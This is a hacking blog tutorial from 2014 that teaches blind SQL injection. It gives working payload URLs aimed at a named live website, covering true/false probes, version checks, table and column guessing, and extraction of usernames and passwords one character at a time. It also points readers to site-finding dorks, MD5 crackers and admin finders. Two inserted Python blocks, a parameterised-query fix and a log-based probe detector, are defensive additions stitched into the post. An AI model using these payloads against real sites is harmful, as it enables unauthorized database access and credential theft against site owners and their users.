Welcome Fellow Hacker!

Sunday, May 4, 2014

Hack Website using Blind SQL INJECTION

5:11 AM



S0.6 - Blind SQL Injection


Let me start off by saying, blind SQL injection is very time consuming. I honestly don't think anyone would judge you if you used a tool while injecting a site using the blind method. Let's get started anyway. I found a site on which I could use union-based injection, so I wouldn't have to guess the table names, which made this tutorial a lot easier to write.

First of all we will want to find a site using dorks, mentioned earlier in this tutorial. If order by/group by isn't working for you, you could try blind (or error based; I'll make a tutorial for that soon).
When we have our site with a vulnerable parameter, you will want to test whether it is vulnerable. We can do this by adding "and 1=1" to the end of our URL; if it loads normally, that's good. Now if we add "and 1=2" and get an error, or the page doesn't load normally, it's most likely vulnerable.


Code:
http://www.giacusa.com/news.php?newsid=126 and 1=1
< no error
Code:
http://www.giacusa.com/news.php?newsid=126 and 1=2
< doesn't load properly

It does this because you're providing either a true or a false statement. 1=1 is true. 1=2 is false. This is the method we will be using to gather information.
To find the version we will want to use
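As an added example (not code from the original post), here is why the true/false trick works and what stops it: a Python/sqlite3 stand-in for a news.php-style lookup, with the query built by string concatenation beside a parameterised version. The table, rows and function names are assumptions.

```python
import sqlite3

def make_db():
    """Constructed in-memory stand-in for the table behind news.php?newsid=..."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE news (newsid INTEGER, title TEXT)")
    db.executemany("INSERT INTO news VALUES (?, ?)",
                   [(126, "Article 126"), (127, "Article 127")])
    return db

def fetch_vulnerable(db, newsid_param):
    """Query built by string concatenation, the pattern behind the tutorial's
    target. The raw parameter becomes part of the SQL text, so a trailing
    'and 1=2' is evaluated as a condition and the article disappears: that
    visible difference in the page is the oracle blind injection relies on."""
    sql = "SELECT title FROM news WHERE newsid=" + newsid_param
    row = db.execute(sql).fetchone()
    return row[0] if row else None

def fetch_safe(db, newsid_param):
    """Hardened form: the parameter is checked to be an integer and then
    bound with a placeholder, so the database never parses it as SQL.
    Any probe text is simply an invalid id and gets the same empty
    response whether it would have been 'true' or 'false'."""
    try:
        newsid = int(newsid_param)
    except ValueError:
        return None
    row = db.execute("SELECT title FROM news WHERE newsid=?", (newsid,)).fetchone()
    return row[0] if row else None

def compare(probe):
    """Run one probe string through both versions; returns (vulnerable, safe)."""
    db = make_db()
    return fetch_vulnerable(db, probe), fetch_safe(db, probe)
```

With the hardened version the "and 1=1" and "and 1=2" requests are indistinguishable, so the attacker gets no oracle.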

Code:
and substring(@@version,1,1)=VERSIONHERE

Where we have "VERSIONHERE", you will want to put the version there. Most sites would use either 4 or 5. Using what I said earlier, if the version is false, it won't load correctly. If it is true, it will.

Code:
http://www.giacusa.com/news.php?newsid=126 and substring(@@version,1,1)=4
< doesn't load properly
Code:
http://www.giacusa.com/news.php?newsid=126 and substring(@@version,1,1)=5
< loads fine

So we have established that the version is 5. We will use this method of guessing to find out pretty much all the info, as we would in a union-based injection.
Now to find the tables we will have to guess the names. Since union-based injection works on the site I'm using as an example, I just quickly got the tables/columns that way to make the tutorial simple. But otherwise you would have to guess. You could use common table names such as admin, user, login etc. We will use " (SELECT 1 from TABLE limit 0,1)=1 ".

Code:
http://www.giacusa.com/news.php?newsid=126  and (SELECT 1 from test limit 0,1)=1
< page doesn't load correctly.
Code:
http://www.giacusa.com/news.php?newsid=126  and (SELECT 1 from test2 limit 0,1)=1
< page doesn't load correctly.
Code:
http://www.giacusa.com/news.php?newsid=126  and (SELECT 1 from chapters limit 0,1)=1
< page loads fine. so there is a table named chapters.

Now to find the columns from a table, we will have to use the same method. We will use " (SELECT substring(concat(1,COLUMNNAME),1,1) from TABLENAME limit 0,1)=1 ". So,

Code:
http://www.giacusa.com/news.php?newsid=126 and (SELECT substring(concat(1,test1),1,1) from chapters limit 0,1)=1
< doesn't load properly
Code:
http://www.giacusa.com/news.php?newsid=126 and (SELECT substring(concat(1,test2),1,1) from chapters limit 0,1)=1
< doesn't load properly
Code:
http://www.giacusa.com/news.php?newsid=126 and (SELECT substring(concat(1,category),1,1) from chapters limit 0,1)=1
< loads fine. There is a column named category.

After you have done that, here comes the really time-consuming part. We will have to guess each letter of the data value, one by one, by its ASCII code. So "test" = "74 65 73 74" (in hex; the comparisons below use the decimal values). You can find an ASCII chart here - http://www.asciitable.com/. Or you can use the text > hex feature in the Hackbar addon for Firefox. Or use this - http://easycalculation.com/ascii-hex.php.

We will want to use -
Code:
ascii(substring((SELECT concat(COLUMN) from TABLE),CHARACTER NUMBER,1))>ASCII VALUE HERE

It didn't work on my site for some reason, but I'll explain it anyway. Say user = john.

Code:
and ascii(substring((SELECT concat(user) from users WHERE id=1),1,1))>64
should load normally, because most sites wouldn't allow "@" in the username, but it's possible. @ = 64 in ASCII. Since it loads normally you know it is greater than 64.

Code:
and ascii(substring((SELECT concat(user) from users WHERE id=1),1,1))>105
will load normally, because the "j" in john = 106 in ascii.
Code:
and ascii(substring((SELECT concat(user) from users WHERE id=1),1,1))>106
will return an error, because "j" is not greater than 106; it is 106. It's like finding columns really. So after we know it is 106 in ASCII, we write that down. 106 = j.

Now we will need to find the other letters, so we will change "1,1" to "2,1" which will move one character along.

Code:
and ascii(substring((SELECT concat(user) from users WHERE id=1),2,1))>110
will load normally, because the "o" in john is greater than 110. It's 111. So

Code:
and ascii(substring((SELECT concat(user) from users WHERE id=1),2,1))>111
will return an error because o is equal to 111, not greater. But since ">110" loads and ">111" doesn't, you know it's 111. So now you have the first two characters; just keep repeating this until you get an error no matter what, then you will know that you have the full username. Then after you have done that, move to a different column, such as password :). Like I said, this can be really time consuming; this is probably one of the only times I'd use a tool personally.
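From the defender's side, as an added example that is not part of the original post: a small Python scanner that looks for the probe shapes used above (and 1=1/1=2, substring(@@version, (SELECT 1 from ..., ascii(substring(...)) in constructed Apache-style access-log lines and flags a source sending a run of them. The log lines, IPs, timestamps and rule names are all made up.

```python
import re
from urllib.parse import unquote_plus
# Constructed sample access-log lines (Apache combined format, no referer/agent)
# modelled on the probes in the tutorial; IPs and timestamps are made up.
SAMPLE_LOG = """\
203.0.113.5 - - [04/May/2014:05:11:01 +0000] "GET /news.php?newsid=126 HTTP/1.1" 200 5120
203.0.113.5 - - [04/May/2014:05:11:09 +0000] "GET /news.php?newsid=126%20and%201=1 HTTP/1.1" 200 5120
203.0.113.5 - - [04/May/2014:05:11:14 +0000] "GET /news.php?newsid=126%20and%201=2 HTTP/1.1" 200 812
203.0.113.5 - - [04/May/2014:05:12:30 +0000] "GET /news.php?newsid=126+and+substring(@@version,1,1)=5 HTTP/1.1" 200 5120
203.0.113.5 - - [04/May/2014:05:15:10 +0000] "GET /news.php?newsid=126+and+(SELECT+1+from+chapters+limit+0,1)=1 HTTP/1.1" 200 5120
203.0.113.5 - - [04/May/2014:05:20:02 +0000] "GET /news.php?newsid=126+and+ascii(substring((SELECT+concat(user)+from+users+WHERE+id=1),1,1))>106 HTTP/1.1" 200 812
198.51.100.7 - - [04/May/2014:05:21:00 +0000] "GET /news.php?newsid=127 HTTP/1.1" 200 4990
"""

REQUEST_RE = re.compile(
    r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) HTTP/[\d.]+" (\d{3}) (\d+)')

# Each rule: (name, regex applied to the URL-decoded, lower-cased query string)
RULES = [
    ("boolean-probe", re.compile(r"\band\s+1\s*=\s*[12]\b")),
    ("version-probe", re.compile(r"substring\s*\(\s*@@version")),
    ("table-guess", re.compile(r"\(\s*select\s+1\s+from\s+\w+")),
    ("char-extraction", re.compile(r"ascii\s*\(\s*substring\s*\(")),
]

def scan_log(text):
    """Return one (ip, rule, decoded query) tuple per matching request."""
    hits = []
    for line in text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        ip, path = m.group(1), m.group(2)
        # Decode %20 and '+' first: the raw line never contains the literal probe.
        query = unquote_plus(path.split("?", 1)[1]).lower() if "?" in path else ""
        for name, rx in RULES:
            if rx.search(query):
                hits.append((ip, name, query))
                break
    return hits

def suspicious_sources(hits, threshold=2):
    """Sources with more than `threshold` hits. One odd request can be noise;
    a run of true/false probes against one parameter is the blind signature."""
    counts = {}
    for ip, _, _ in hits:
        counts[ip] = counts.get(ip, 0) + 1
    return sorted(ip for ip, n in counts.items() if n > threshold)
```

The same true/false pattern also shows up as alternating response sizes for the same path (5120 vs 812 above), which is worth correlating even when the query string is obfuscated past these regexes.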

Resources.

http://hashchecker.de/find.html - Sends the query to a number of MD5 checking sites, saves a lot of time.
http://timwarriner.com/software/md5brute.html - MD5 Bruteforcer.
http://itsecteam.com/en/projects/project1_page2.htm - If you're a skid and can't be bothered following a simple tutorial, this is for you.
http://th3-0utl4ws.com/tools/admin-finder/ - Online admin finder.
http://pastebin.com/wsfBfegb - Admin Finder, scripted in perl. By GlaDiaT0R. Supports PHP/CFM/HTML/ASP
http://www.string-functions.com/string-hex.aspx - String to hexadecimal converter.
